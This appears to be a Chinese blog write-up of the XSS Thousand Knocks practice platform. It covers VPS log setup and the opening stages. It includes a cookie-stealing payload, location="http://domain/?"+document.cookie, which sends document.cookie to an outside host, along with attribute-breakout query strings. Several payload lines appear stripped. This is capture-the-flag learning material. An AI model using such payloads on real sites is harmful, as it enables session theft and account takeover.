XSS Thousand Knocks:Stage 01 - 12

在学完 Sqli-Labs 之后一直想学 XSS,总是因各种事情耽搁,还因为自己太懒了。
然后每打一次比赛都能深刻感受到自己的菜,每次都告诫自己不能再这样下去了。
搭了自己的 VPS 和博客之后觉得 WordPress 也么有想象中的那么好用,有学习笔记啥的还是放在上,也许以后那边会放些 WP。

XSS Thousand Knocks 是一个练习 XSS 的平台,看到夏语的博客里说这个比先知挑战赛的质量差很多,先拿来作为入门练习吧。
做这些题你需要一个有公网 IP 的 VPS,你成功做出题后服务器会把 flag 打到你的服务器上,通过查看 VPS 的日志获取 flag。
我的 VPS 是用宝塔 Linux 面板一键安装的Nginx,它的日志路径是/www/wwwlogs/domain.log,使用tail -f domain.log -n 20实时查看日志的最后 20 行。
XSS 的笔记会比 Sqli 的少很多,所以大概一篇就够了。

0x01. Stage 01:开篇引导

XSS Thousand Knocks:Stage 01 - 12_第1张图片

这是一个引导关,在给你的每一个关卡链接中找到 XSS 漏洞,再将 payload 的相应部分换成location=%22http://domain/?%22%2Bdocument.cookie填入下方的URL form,然后在 VPS 的日志里找到 flag。

XSS Thousand Knocks:Stage 01 - 12_第2张图片

?alert(1)
?location=%22http://domain/?%22%2Bdocument.cookie

XSS Thousand Knocks:Stage 01 - 12_第3张图片

0x02. Stage 02 - 06:尖括号闭合

Stage 02

?q=XSS

XSS

?q=
?q=

Stage 03

?q=XSS

Link

?q="/>
?q="/>

Stage 04

?q=XSS

Link

?q='/>
?q='/>

Stage 05

?q=XSS